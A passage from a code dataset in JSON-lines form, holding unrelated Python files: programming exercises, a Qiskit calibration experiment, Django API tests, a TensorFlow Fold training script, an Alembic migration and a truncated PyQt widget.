'_'.join(hashvalues[:2]) + '.png'\n\n path = os.path.join(save_path, figname)\n fig.savefig(path)\n \n return fig\n","sub_path":"sin2_psi/peakfit.py","file_name":"peakfit.py","file_ext":"py","file_size_in_byte":7678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510201425","text":"from __future__ import print_function, division\n\ncache = {}\ndef ackermann(m, n):\n\tif m == 0:\n\t\treturn n + 1\n\tif n == 0:\n\t\treturn ackermann(m-1, 1)\n\tif (m, n) in cache:\n\t\treturn cache[m, n]\n\telse:\n\t\tcache[m, n] = ackermann(m -1, ackermann(m, n -1))\n\t\treturn cache[m ,n]\n\nprint(ackermann(3, 4))\nprint(ackermann(3, 6))","sub_path":"python_code/textbooks/think_python/ex11-3.py","file_name":"ex11-3.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78331248","text":"class Solution:\n def robOne(self, i, nums, memo):\n if i >= len(nums):\n return 0\n elif i in memo:\n return memo[i]\n profit = max(nums[i] + self.robOne(i+2, nums, memo), self.robOne(i+1, nums, memo))\n memo[i] = profit\n return profit\n \n def rob(self, nums: List[int]) -> int:\n if not nums: return 0\n if len(nums) < 3: return max(nums)\n \n first = nums[:-1]\n second = nums[1:]\n return max(self.robOne(0, first, {}), self.robOne(0, second, {}))","sub_path":"week-3/recursion-memoization/HouseRobberII.py","file_name":"HouseRobberII.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"554577020","text":"'''\r\nQno3.\r\nWrite a Python program to get a single string from two given strings, separated by a space 
and\r\nswap the first two characters of each string.\r\n\r\n'''\r\n\r\n\r\nstring = input(\"enter the string: \")\r\n\r\na,b=string.split(\" \")\r\n\r\na, b = a.replace(a[:2], b[:2]) , b.replace(b[:2], a[:2])\r\n\r\nprint(a+\",\"+b)\r\n\r\n","sub_path":"FinjoAss2/Qno3.py","file_name":"Qno3.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"136460499","text":"# PyPoll Challenge written in Visual Studio Code by Nick Rosing\n# import modules\nimport os\nimport csv\n\n# Lists for csv columns\nvoter_id = []\ncandidates = []\n\n# Set file path\nvotes_csv = os.path.join(\".\", \"Resources\", \"election_data.csv\")\n\n# Open and read Poll Data-csv file, skipping header\nwith open(votes_csv,encoding=\"utf-8\", newline=\"\") as csvfile:\n csvreader = csv.reader(csvfile, delimiter=\",\")\n csv_header = next(csvreader)\n\n # assign columns to lists\n for row in csvreader:\n voter_id.append(row[0])\n candidates.append(row[2])\n\n# Create variables for all of the counts/percentages per candidate\ntotal_votes = len(voter_id)\nkhan_count = candidates.count('Khan')\nkhan_percent = khan_count/total_votes\ncorrey_count = candidates.count('Correy')\ncorrey_percent = correy_count/total_votes\nli_count = candidates.count('Li')\nli_percent = li_count/total_votes\notooley_count = candidates.count(\"O'Tooley\")\notooley_percent = otooley_count/total_votes\n\n# Determine the winner\nwinner = max(khan_count, correy_count, li_count, otooley_count)\n\nif winner == khan_count:\n winner_name = \"Khan\"\nelif winner == correy_count:\n winner_name = \"Correy\"\nelif winner == li_count:\n winner_name = \"Li\"\nelse:\n winner_name = \"O'Tooley\"\n\n# Create Poll results terminal output\nprint(f\"Election Results\")\nprint(f\"-------------------------\")\nprint(f\"Total Votes: {total_votes}\")\nprint(f\"-------------------------\")\nprint(f\"Khan: {khan_percent:.3%} ({khan_count})\")\nprint(f\"Correy: {correy_percent:.3%} ({correy_count})\")\nprint(f\"Li: {li_percent:.3%} ({li_count})\")\nprint(f\"O'Tooley: {otooley_percent:.3%} ({otooley_count})\")\nprint(f\"-------------------------\")\nprint(f\"Winner: {winner_name}\")\nprint(f\"-------------------------\")\n\n# Push results into Text file\n# Create path for file to be written to\noutcome_file = os.path.join(\".\", \"Resources\", \"election_results.text\")\n\n# open file in \"write\" mode\nwith open (outcome_file, \"w\",) as txtfile:\n\n txtfile.write(f\"Election Results\\n\")\n txtfile.write(f\"-------------------------\\n\")\n txtfile.write(f\"Total Votes: {total_votes}\\n\")\n txtfile.write(f\"-------------------------\\n\")\n txtfile.write(f\"Khan: {khan_percent:.3%} ({khan_count})\\n\")\n txtfile.write(f\"Correy: {correy_percent:.3%} ({correy_count})\\n\")\n txtfile.write(f\"Li: {li_percent:.3%} ({li_count})\\n\")\n txtfile.write(f\"O'Tooley: {otooley_percent:.3%} ({otooley_count})\\n\")\n txtfile.write(f\"-------------------------\\n\")\n txtfile.write(f\"Winner: {winner_name}\\n\")\n txtfile.write(f\"-------------------------\")","sub_path":"PyPoll/poll_main.py","file_name":"poll_main.py","file_ext":"py","file_size_in_byte":2556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"305323065","text":"# This code is part of Qiskit.\n#\n# (C) Copyright IBM 2021.\n#\n# This code is licensed under the Apache License, Version 2.0. 
You may\n# obtain a copy of this license in the LICENSE.txt file in the root directory\n# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.\n#\n# Any modifications or derivative works of this code must retain this\n# copyright notice, and modified files need to carry a notice indicating\n# that they have been altered from the originals.\n\n\"\"\"Half angle characterization.\"\"\"\n\nfrom typing import List, Optional, Sequence\nimport numpy as np\n\nfrom qiskit import QuantumCircuit\nfrom qiskit.providers import Backend\n\nfrom qiskit_experiments.framework import BaseExperiment, Options\nfrom qiskit_experiments.curve_analysis.standard_analysis import ErrorAmplificationAnalysis\nfrom qiskit_experiments.curve_analysis import ParameterRepr\nfrom qiskit_experiments.warnings import qubit_deprecate\n\n\nclass HalfAngle(BaseExperiment):\n r\"\"\"An experiment class to measure the amount by which sx and x are not parallel.\n\n # section: overview\n\n This experiment runs circuits that repeat blocks of :code:`sx - sx - y` gates\n inserted in a Ramsey type experiment, i.e. the full gate sequence is thus\n :code:`Ry(π/2) - [sx - sx - y] ^ n - sx` where :code:`n` is varied.\n\n .. parsed-literal::\n\n ┌─────────┐┌────┐┌────┐┌───┐ ┌────┐┌────┐┌───┐┌────┐ ░ ┌─┐\n q_0: ┤ Ry(π/2) ├┤ sx ├┤ sx ├┤ y ├...┤ sx ├┤ sx ├┤ y ├┤ sx ├─░─┤M├\n └─────────┘└────┘└────┘└───┘ └────┘└────┘└───┘└────┘ ░ └╥┘\n meas: 1/════════════════════════════...═══════════════════════════╩═\n 0\n\n This sequence measures angle errors where the axis of the :code:`sx` and :code:`x`\n rotation are not parallel. A similar experiment is described in Ref.~[1] where the\n gate sequence :code:`x - y` is repeated to amplify errors caused by non-orthogonal\n :code:`x` and :code:`y` rotation axes. Such errors can occur due to phase errors.\n For example, the non-linearities in the mixer's skew for :math:`\\pi/2` pulses may\n be different from the :math:`\\pi` pulse.\n\n # section: analysis_ref\n :class:`.ErrorAmplificationAnalysis`\n\n # section: reference\n .. 
ref_arxiv:: 1 1504.06597\n \"\"\"\n\n @classmethod\n def _default_experiment_options(cls) -> Options:\n r\"\"\"Default values for the half angle experiment.\n\n Experiment Options:\n repetitions (List[int]): A list of the number of times that the gate\n sequence :code:`[sx sx y]` is repeated.\n \"\"\"\n options = super()._default_experiment_options()\n options.repetitions = list(range(15))\n return options\n\n @classmethod\n def _default_transpile_options(cls) -> Options:\n \"\"\"Default transpile options.\n\n The basis gates option should not be changed since it will affect the gates and\n the pulses that are run on the hardware.\n \"\"\"\n options = super()._default_transpile_options()\n options.basis_gates = [\"sx\", \"rz\", \"y\"]\n options.inst_map = None\n return options\n\n @qubit_deprecate()\n def __init__(self, physical_qubits: Sequence[int], backend: Optional[Backend] = None):\n \"\"\"Setup a half angle experiment on the given qubit.\n\n Args:\n physical_qubits: List containing the qubits on which to run the\n fine amplitude calibration experiment.\n backend: Optional, the backend to run the experiment on.\n \"\"\"\n analysis = ErrorAmplificationAnalysis()\n\n default_bounds = analysis.options.bounds\n default_bounds.update({\"d_theta\": (-np.pi / 2, np.pi / 2)})\n\n analysis.set_options(\n fixed_parameters={\n \"angle_per_gate\": np.pi,\n \"phase_offset\": -np.pi / 2,\n \"amp\": 1.0,\n },\n result_parameters=[ParameterRepr(\"d_theta\", \"d_hac\", \"rad\")],\n normalization=True,\n bounds=default_bounds,\n )\n\n super().__init__(physical_qubits, analysis=analysis, backend=backend)\n\n @staticmethod\n def _pre_circuit() -> QuantumCircuit:\n \"\"\"Return the preparation circuit for the experiment.\"\"\"\n return QuantumCircuit(1)\n\n def circuits(self) -> List[QuantumCircuit]:\n \"\"\"Create the circuits for the half angle calibration experiment.\"\"\"\n\n circuits = []\n\n for repetition in self.experiment_options.repetitions:\n circuit = self._pre_circuit()\n\n # First ry gate\n circuit.rz(np.pi / 2, 0)\n circuit.sx(0)\n circuit.rz(-np.pi / 2, 0)\n\n # Error amplifying sequence\n for _ in range(repetition):\n circuit.sx(0)\n circuit.sx(0)\n circuit.y(0)\n\n circuit.sx(0)\n circuit.measure_all()\n\n circuit.metadata = {\n \"experiment_type\": self._type,\n \"qubits\": self.physical_qubits,\n \"xval\": repetition,\n \"unit\": \"repetition number\",\n }\n\n circuits.append(circuit)\n\n return circuits\n\n def _metadata(self):\n metadata = super()._metadata()\n # Store measurement level and meas return if they have been\n # set for the experiment\n for run_opt in [\"meas_level\", \"meas_return\"]:\n if hasattr(self.run_options, run_opt):\n metadata[run_opt] = getattr(self.run_options, run_opt)\n return metadata\n","sub_path":"qiskit_experiments/library/characterization/half_angle.py","file_name":"half_angle.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"245701982","text":"## Reference\n# http://www.lintcode.com/en/problem/binary-tree-level-order-traversal-ii/\n# https://leetcode.com/problems/binary-tree-level-order-traversal-ii/#/description\n\n\n## Tags - Medium\n# Binary Tree; Breadth First Search; Binary Tree Traversal;\n# Queue\n\n\n## Description\n# Given a binary tree, return the bottom-up level order traversal of its nodes' values.\n# (ie. 
from left to right, level by level from leaf to root)\n\n\n## Analysis\n# last problem is top-down; this one is bottom-up.\n# input - the root of the binary tree\n# output - the node values list from leaf to root\n# The first/direct solution is the DFS max-depth one, similar to the previous problem:\n# we only need to traverse level by level, but how could we know the max depth up front?\n# So we can reuse the previous solution and then reverse the result. Any better solution? \n\n# Time - O(N); Space - O(N) as using extra queue or extra tempstack for reverse\n\n\n## Solution\n# binary tree definition\nclass TreeNode:\n    def __init__(self, val):\n        self.val = val\n        self.left, self.right = None, None\n\nclass Solution:\n    # DFS for BFS\n    def dfs(self, root, depth, max_depth):\n        if not root or depth > max_depth:\n            return []\n        # base case\n        if depth == max_depth:\n            return [root.val]\n        left = self.dfs(root.left, depth+1, max_depth)\n        right = self.dfs(root.right, depth+1, max_depth)\n        return left+right\n\n    # while + DFS\n    def levelOrderBottom2(self, root):\n        if not root:\n            return []\n        result = []\n        depth, max_depth = 0, 0\n        while True:\n            level = self.dfs(root, depth, max_depth)\n            if not level:\n                break\n            result.append(level)\n            max_depth += 1\n        return list(reversed(result))\n\n\n    # One queue BFS + reverse\n    def levelOrderBottom1(self, root):\n        if not root:\n            return []\n        result = []\n        from collections import deque\n        q = deque([root])\n        while q:\n            level = []\n            qlen = len(q)\n            for i in range(qlen):\n                current = q.popleft()\n                level.append(current.val)\n                if current.left:\n                    q.append(current.left)\n                if current.right:\n                    q.append(current.right)\n            result.append(level)\n        result.reverse()\n        return result\n\n\n","sub_path":"data_structures/tree/binary_tree/binarytree_levelorder_traversal2.py","file_name":"binarytree_levelorder_traversal2.py","file_ext":"py","file_size_in_byte":2454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"505927622","text":"# stdlib\nimport json\nfrom urllib.parse import urlencode\n# third party\nfrom brasil_municipios.models import Municipio\nfrom django.contrib.gis.geos import Point, LinearRing, Polygon, MultiPolygon\nfrom django.core.urlresolvers import reverse\nfrom django.test import Client, TestCase\nfrom django.utils.text import slugify\n# project\nfrom spot.models import Spot\n\n\ncities_test_data = {\n    'cities': [\n        {\n            'name': 'City B', 'state': 'ST', 'geocode': '2',\n            'geometry': MultiPolygon(Polygon(LinearRing(\n                Point(3, 7), Point(9, 7), Point(9, 1),\n                Point(3, 1), Point(3, 7),\n            )))\n        },\n        {\n            'name': 'City A', 'state': 'ST', 'geocode': '1',\n            'geometry': MultiPolygon(Polygon(LinearRing(\n                Point(-6, 2), Point(1, 2), Point(1, -6),\n                Point(-6, -6), Point(-6, 2),\n            )))\n        },\n        {\n            'name': 'City C', 'state': 'ST', 'geocode': '3', # No spots here\n            'geometry': MultiPolygon(Polygon(LinearRing(\n                Point(4, -3), Point(7, -3), Point(7, -5),\n                Point(4, -5), Point(4, -3),\n            )))\n        },\n    ],\n    'spots': [\n        {'name': 'A', 'coords': Point(-5, 1)}, # City A\n        {'name': 'B', 'coords': Point(-4, -4)}, # City A\n        {'name': 'C', 'coords': Point(-2, -1)}, # City A\n        {'name': 'D', 'coords': Point(4, 2)}, # City B\n        {'name': 'E', 'coords': Point(6, 6)}, # City B\n        {'name': 'F', 'coords': Point(-6, 8)}, # No city\n        {'name': 'G', 'coords': Point(-3, 8)}, # No city\n        {'name': 'H', 'coords': Point(-2, 4)}, # No city\n        {'name': 'I', 'coords': Point(3, -2)}, # No city\n        {'name': 'J', 'coords': Point(9, -6)}, # No city\n    
]\n}\n\n\nclass CitiesTestCase(TestCase):\n\n def setUp(self):\n self.cities = [\n Municipio.objects.create(**city_data)\n for city_data in cities_test_data['cities']\n ]\n\n for spot_data in cities_test_data['spots']:\n spot_data['slug'] = slugify(spot_data['name'])\n Spot.objects.create(**spot_data)\n\n self.client = Client(SERVER_NAME='test-server.com')\n self.server_url = 'http://test-server.com'\n self.spots_url = reverse('spots', kwargs={'api_version': 1})\n self.cities_url = reverse('cities', kwargs={'api_version': 1})\n\n def test_list(self):\n response = self.client.get(self.cities_url)\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content.decode('utf-8'))\n\n # City C has no spots, thus shouldn't be returned\n self.assertEqual(len(content), 2)\n\n # content[0] = City A (order by city name by default)\n city_id = self.cities[1].pk\n self.assertEqual(\n content[0],\n {\n 'id': city_id,\n 'name': 'City A',\n 'state': 'ST',\n 'spotsCount': 3,\n 'spotsUrl': ''.join([self.server_url,\n self.spots_url,\n '?',\n urlencode({'city': city_id})])\n }\n )\n # content[1] = City B\n city_id = self.cities[0].pk\n self.assertEqual(content[1], {\n 'id': city_id,\n 'name': 'City B',\n 'state': 'ST',\n 'spotsCount': 2,\n 'spotsUrl': ''.join([self.server_url,\n self.spots_url,\n '?',\n urlencode({'city': city_id})])\n })\n\n def test_sort_by_name(self):\n #\n # ASC\n #\n url = self.cities_url + '?' + urlencode({'sort': 'name'})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content.decode('utf-8'))\n self.assertEqual(content[0]['name'], 'City A')\n self.assertEqual(content[1]['name'], 'City B')\n #\n # DESC\n #\n url = self.cities_url + '?' + urlencode({'sort': '-name'})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content.decode('utf-8'))\n self.assertEqual(content[0]['name'], 'City B')\n self.assertEqual(content[1]['name'], 'City A')\n\n def test_sort_by_count(self):\n #\n # ASC\n #\n url = self.cities_url + '?' + urlencode({'sort': 'spots_count'})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content.decode('utf-8'))\n self.assertEqual(content[0]['name'], 'City B') # 2 spots\n self.assertEqual(content[1]['name'], 'City A') # 3 spots\n #\n # DESC\n #\n url = self.cities_url + '?' 
+ urlencode({'sort': '-spots_count'})\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n content = json.loads(response.content.decode('utf-8'))\n self.assertEqual(content[0]['name'], 'City A') # 3 spots\n self.assertEqual(content[1]['name'], 'City B') # 2 spots\n","sub_path":"city/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"41629058","text":"import pandas as pd\n\n\nfile_book = r\"C:\\test\\train\\BOOK_AUTHORS.CSV\"\nfile_site = r\"C:\\test\\train\\SITE_DATA.CSV\"\ndf_book = pd.read_csv(file_book)\ndf_site = pd.read_csv(file_site)\n\ndf = pd.merge(df_site, df_book, on='title', how='left').drop_duplicates()\n\ndf.to_csv(r'C:\\test\\train\\NEW_MEN.csv', index=False)\n","sub_path":"train/test/new_mentioned.py","file_name":"new_mentioned.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"205112103","text":"from __future__ import print_function\nimport tensorflow as tf\nimport tensorflow_fold as td\nimport model_fold\nimport preprocessing\nimport spacy\nimport pickle\nimport pprint\nimport os\nimport sequence_node_sequence_pb2\nimport sequence_node_candidates_pb2\nimport numpy as np\n\n# Replication flags:\ntf.flags.DEFINE_string('logdir', '/home/arne/tmp/tf/log',\n 'Directory in which to write event logs.')\ntf.flags.DEFINE_string('model_path', '/home/arne/tmp/tf/log/model.ckpt-976',\n 'model file')\ntf.flags.DEFINE_string('data_mapping_path', 'data/nlp/spacy/dict.mapping',\n 'model file')\ntf.flags.DEFINE_string('train_dict_path', 'data/nlp/spacy/dict.vecs',\n 'Numpy array which is used to initialize the embedding vectors.')\ntf.flags.DEFINE_string('master', '',\n 'Tensorflow master to use.')\ntf.flags.DEFINE_integer('task', 0,\n 'Task ID of the replica running the training.')\ntf.flags.DEFINE_integer('ps_tasks', 0,\n 'Number of PS tasks in the job.')\nFLAGS = tf.flags.FLAGS\n\nPROTO_PACKAGE_NAME = 'recursive_dependency_embedding'\nPROTO_CLASS = 'SequenceNode'\n\ndef parse_iterator(sequences, parser, sentence_processor, data_maps):\n #pp = pprint.PrettyPrinter(indent=2)\n for (s, idx_correct) in sequences:\n seq_tree_seq = sequence_node_sequence_pb2.SequenceNodeSequence()\n seq_tree_seq.idx_correct = idx_correct\n for s2 in s:\n new_tree = seq_tree_seq.trees.add()\n preprocessing.build_sequence_tree_from_str(s2, sentence_processor, parser, data_maps, seq_tree=new_tree)\n #pp.pprint(seq_tree_seq)\n yield td.proto_tools.serialized_message_to_tree('recursive_dependency_embedding.SequenceNodeSequence', seq_tree_seq.SerializeToString())\n\n\ndef parse_iterator_candidates(sequences, parser, sentence_processor, data_maps):\n pp = pprint.PrettyPrinter(indent=2)\n for s in sequences:\n seq_data, seq_parents = preprocessing.read_data(preprocessing.identity_reader, sentence_processor, parser, data_maps,\n args={'content': s}, expand_dict=False)\n children, roots = preprocessing.children_and_roots(seq_parents)\n\n # dummy position\n insert_idx = 5\n candidate_indices = [2, 8]\n seq_tree_cand = preprocessing.build_sequence_tree_with_candidates(seq_data, children, roots[0], insert_idx, candidate_indices)\n pp.pprint(seq_tree_cand)\n yield td.proto_tools.serialized_message_to_tree('recursive_dependency_embedding.SequenceNodeCandidates', seq_tree_cand.SerializeToString())\n\nlex_size = 1300000\nembedding_dim = 300\n\ndef main(unused_argv):\n 
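# NOTE: this sketch assumes FLAGS.data_mapping_path points at the pickled\n    # string-to-id mapping; the external-embedding initialization further down\n    # is deliberately commented out (DEBUG EXCLUDE), so embed_w keeps its\n    # zero-constant initial value for this dummy run.\n    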
print('load spacy ...')\n nlp = spacy.load('en')\n nlp.pipeline = [nlp.tagger, nlp.parser]\n print('load data_mapping from: '+FLAGS.data_mapping_path + ' ...')\n data_maps = pickle.load(open(FLAGS.data_mapping_path, \"rb\"))\n\n # DEBUG EXCLUDE\n #print('load embeddings from: ' + FLAGS.train_dict_path + ' ...')\n #embeddings_np = np.load(FLAGS.train_dict_path)\n\n #embedding_dim = embeddings_np.shape[1]\n #lex_size = 1300000\n lex_size = 100000\n #assert lex_size >= embeddings_np.shape[0], 'len(embeddings) > lex_size. Can not cut the lexicon!'\n #embeddings_padded = np.lib.pad(embeddings_np, ((0, lex_size - embeddings_np.shape[0]), (0, 0)), 'mean')\n\n with tf.Graph().as_default():\n with tf.device(tf.train.replica_device_setter(FLAGS.ps_tasks)):\n embed_w = tf.Variable(tf.constant(0.0, shape=[lex_size, embedding_dim]), trainable=True, name='embeddings')\n embedding_placeholder = tf.placeholder(tf.float32, [lex_size, embedding_dim])\n embedding_init = embed_w.assign(embedding_placeholder)\n\n trainer = model_fold.SequenceTreeEmbeddingWithCandidates(embed_w)\n\n softmax_correct = trainer.softmax_correct\n loss = trainer.loss\n train_op = trainer.train_op\n global_step = trainer.global_step\n\n # collect important variables\n scoring_vars = tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=model_fold.DEFAULT_SCOPE_SCORING)\n\n # Add ops to save and restore all the variables.\n saver = tf.train.Saver()\n\n # Later, launch the model, use the saver to restore variables from disk, and\n # do some work with the model.\n with tf.Session() as sess:\n\n # DEBUG EXCLUDE\n # exclude embedding, will be initialized afterwards\n #init_vars = [v for v in tf.global_variables() if v != embed_w]\n #tf.variables_initializer(init_vars).run()\n #print('init embeddings with external vectors...')\n #sess.run(embedding_init, feed_dict={embedding_placeholder: embeddings_padded})\n tf.global_variables_initializer().run()\n\n #tf.variables_initializer(tf.global_variables()).run()\n\n # Restore variables from disk.\n #print('restore model ...')\n #saver.restore(sess, FLAGS.model_path)\n # Do some work with the model\n print('parse input ...')\n #batch = list(parse_iterator([(['Hallo.', 'Hallo!', 'Hallo?', 'Hallo'], 0), (['Hallo.', 'Hallo!', 'Hallo?', 'Hallo'], 0)],\n # nlp, preprocessing.process_sentence3, data_maps))\n batch = list(parse_iterator_candidates(\n [u'London is a big city in the United Kingdom. 
I like this.'],\n nlp, preprocessing.process_sentence2, data_maps))\n\n #batch = list(parse_iterator(\n # [([u'Hallo.'], 0)],\n # nlp, preprocessing.process_sentence3, data_maps))\n\n fdict = trainer.build_feed_dict(batch)\n print('calculate tree embeddings ...')\n #_, step, loss_v = sess.run([train_op, global_step, loss], feed_dict=fdict)\n _, step, loss_v, smax_correct = sess.run([train_op, global_step, loss, softmax_correct], feed_dict=fdict)\n #print(loss_v)\n print('step=%d: loss=%f' % (step, loss_v))\n print(smax_correct)\n\n\nif __name__ == '__main__':\n ROOT_DIR = os.path.dirname(os.path.abspath(__file__))\n td.proto_tools.map_proto_source_tree_path('', ROOT_DIR)\n td.proto_tools.import_proto_file('sequence_node.proto')\n td.proto_tools.import_proto_file('sequence_node_sequence.proto')\n td.proto_tools.import_proto_file('sequence_node_candidates.proto')\n tf.app.run()\n","sub_path":"train_fold_nce_dummy.py","file_name":"train_fold_nce_dummy.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"88866432","text":"\"\"\"empty message\n\nRevision ID: 0e077408e5ad\nRevises: f3e03b3ea4ad\nCreate Date: 2018-02-25 16:03:16.853738\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils.types\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '0e077408e5ad'\ndown_revision = 'f3e03b3ea4ad'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('direct_keyword', sa.Column('AuctionBids', sa.JSON(none_as_null=True), nullable=True))\n op.add_column('direct_keyword', sa.Column('date_bids_updated', sqlalchemy_utils.types.arrow.ArrowType(timezone=True), nullable=True))\n op.drop_column('direct_keyword', 'date_updated')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('direct_keyword', sa.Column('date_updated', postgresql.TIMESTAMP(timezone=True), autoincrement=False, nullable=False))\n op.drop_column('direct_keyword', 'date_bids_updated')\n op.drop_column('direct_keyword', 'AuctionBids')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/0e077408e5ad_.py","file_name":"0e077408e5ad_.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"254949146","text":"#!/usr/bin/env python3\nimport sys\nimport os\nfrom PyQt5 import uic\nfrom PyQt5.QtGui import QIcon,QPixmap,QCursor\nfrom PyQt5.QtCore import Qt,QEvent,QPoint,QSize\nfrom PyQt5.QtWidgets import QLabel, QWidget,QVBoxLayout,QHBoxLayout,QCheckBox,QSizePolicy,QToolButton,QMenu,QToolTip\n\n\nfrom . import waitingSpinner\n\nfrom . 
import settings\nimport gettext\ngettext.textdomain(settings.TEXT_DOMAIN)\n_ = gettext.gettext\n\n\nclass InstallersBox(QWidget):\n\tdef __init__(self):\n\t\tsuper(InstallersBox, self).__init__() # Call the inherited classes __init__ method\n\t\t\n\t\tself.core=Core.Core.get_core()\n\t\tui_file=self.core.rsrc_dir+\"installersBox.ui\"\n\t\tuic.loadUi(ui_file, self) # Load the .ui fil\n\t\tself.boxInstallers=self.findChild(QVBoxLayout,'installersBox')\n\t\tself.boxInstallers.setAlignment(Qt.AlignTop)\n\t\tself.scrollArea=self.findChild(QWidget,'scrollAreaWidgetContents')\n\t\tself.scrollArea.setStyleSheet(\"background-color:white\")\n\t\tself.box_selected=[]\n\t\tself.flavours_selected=[]\n\t\n\t#def __init__\n\n\tdef drawInstallerList(self):\n\t\t\n\t\tself.total_flavours=0\n\t\tself.total_flavours=self.core.flavourSelectorManager.total_flavours\n\t\t'''\n\t\tfor item in self.core.flavourSelectorManager.flavour_list:\n\t\t\tif self.core.flavourSelectorManager.flavour_list[item][\"show\"]:\n\t\t\t\tself.total_flavours+=1\n\t\t'''\n\t\tself.count=0\n\t\tfor item in self.core.flavourSelectorManager.flavour_list:\n\t\t\talternative_type=\"\"\n\t\t\talternative_list=\"\"\n\t\t\tif self.core.flavourSelectorManager.flavour_list[item][\"show\"]:\n\t\t\t\tself.count+=1\n\t\t\t\tif \"client\" in self.core.flavourSelectorManager.flavour_list[item][\"pkg\"]:\n\t\t\t\t\tif len(self.core.flavourSelectorManager.client_desktop_alternatives)>0:\n\t\t\t\t\t\talternative_type=\"client-desktop\"\n\t\t\t\t\t\talternative_list=self.core.flavourSelectorManager.client_desktop_alternatives\n\t\t\t\t\telif len(self.core.flavourSelectorManager.client_lite_alternatives)>0:\n\t\t\t\t\t\talternative_type=\"client-lite\"\n\t\t\t\t\t\talternative_list=self.core.flavourSelectorManager.client_lite_alternatives\n\t\t\t\tif \"server\" in self.core.flavourSelectorManager.flavour_list[item][\"pkg\"]:\n\t\t\t\t\tif len(self.core.flavourSelectorManager.server_alternatives)>0:\n\t\t\t\t\t\talternative_type=\"server\"\n\t\t\t\t\t\talternative_list=self.core.flavourSelectorManager.server_alternatives\n\t\t\t\tif \"desktop\" in self.core.flavourSelectorManager.flavour_list[item][\"pkg\"]:\n\t\t\t\t\tif len(self.core.flavourSelectorManager.desktop_alternatives)>0:\n\t\t\t\t\t\talternative_type=\"desktop\"\n\t\t\t\t\t\talternative_list=self.core.flavourSelectorManager.desktop_alternatives\n\n\n\t\t\t\tself.newInstallerBox(self.core.flavourSelectorManager.flavour_list[item],item,alternative_type,alternative_list)\n\t\t\t\n\t#def drawInstallerList\n\n\tdef newInstallerBox(self,item,order,alternative_type,alternative_list):\n\n\t\thbox=QHBoxLayout()\n\t\thbox.setContentsMargins(0,0,0,0)\n\t\thbox.setSpacing(0)\n\t\t\n\t\tcheckbox=QCheckBox()\n\t\tcheckbox.setTristate(False)\n\t\tcheckbox.stateChanged.connect(self.changeState)\n\t\t\n\t\ttitle=self.getTitle(item[\"pkg\"])\n\t\tcheckbox.setStyleSheet(\"padding:10px;height:80px\")\n\t\tcheckbox.item=item\n\t\tcheckbox.pkg=item[\"pkg\"]\n\t\tcheckbox.alternative_type=alternative_type\n\t\tcheckbox.setSizePolicy(QSizePolicy(QSizePolicy.Fixed,QSizePolicy.Fixed));\n\t\thbox.addWidget(checkbox)\n\t\t\n\t\ticon=QLabel()\n\t\tpixmap=QPixmap(item[\"banner\"])\n\t\ticon.setPixmap(pixmap)\n\t\ticon.setAlignment(Qt.AlignCenter|Qt.AlignVCenter)\n\t\ticon.setMinimumSize(75,75)\n\t\ticon.setMaximumSize(75,75)\n\t\ticon.item=item\n\t\thbox.addWidget(icon)\n\t\t\n\t\tname=QLabel()\n\t\tname.setText(item[\"name\"]+\": \"+title)\n\t\tname.setAlignment(Qt.AlignLeft|Qt.AlignVCenter)\n\t\tif self.count 0 and 
